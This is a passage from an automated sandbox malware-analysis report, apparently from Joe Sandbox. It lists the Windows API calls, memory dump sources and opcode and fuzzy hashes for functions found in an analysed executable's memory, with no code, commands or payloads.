• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
• API String ID: 1726766782-0
• Opcode ID: b495e4daf02a1bd365506ccdf7cb3406510116a3a69ad0e228b01e40eb0a1c70
• Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
• Opcode Fuzzy Hash: b495e4daf02a1bd365506ccdf7cb3406510116a3a69ad0e228b01e40eb0a1c70
• Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
APIs
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
• EnableWindow.USER32(?,00000000), ref: 0044111A
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• EnableWindow.USER32(?,00000001), ref: 004411B3
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
• Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
APIs
• SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
• SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
• GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
• Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
• Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
APIs
• GetForegroundWindow.USER32 ref: 00442597
  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
• GetDesktopWindow.USER32 ref: 004425BF
• GetWindowRect.USER32(00000000), ref: 004425C6
• mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• GetCursorPos.USER32(?), ref: 00442624
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
• String ID:
• API String ID: 4137160315-0
• Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
• Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
• Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
• EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
• EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
• ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
• ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
• EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
• Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
• Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
APIs
• _memset.LIBCMT ref: 0044961A
• SendMessageW.USER32 ref: 0044964A
  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
• SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
• _wcslen.LIBCMT ref: 004496BA
• _wcslen.LIBCMT ref: 004496C7
• SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID: MessageSend$_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1624073603-0
• Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
• Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
• Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
Memory Dump Source
• Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_BL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
• Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
• Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                                            APIs
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1640429340-0
                                                                                                                            • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                            • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                                            • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                                            • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3354276064-0
                                                                                                                            • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                            • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                            • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                            • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 752480666-0
                                                                                                                            • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                            • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                            • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                            • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3275902921-0
                                                                                                                            • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                            • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                            • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                            • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                            • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1413079979-0
                                                                                                                            • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                            • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                            • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                            • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                            APIs
                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                            • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                            • __getptd.LIBCMT ref: 004141A8
                                                                                                                            • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                            • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1803633139-0
                                                                                                                            • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                            • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                            • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                            • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                            APIs
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3275902921-0
                                                                                                                            • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                            • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                            • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                            • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32 ref: 004554DF
                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3691411573-0
                                                                                                                            • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                            • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                                                            • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                            • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1814673581-0
                                                                                                                            • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                            • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                            • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                            • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                            • String ID:
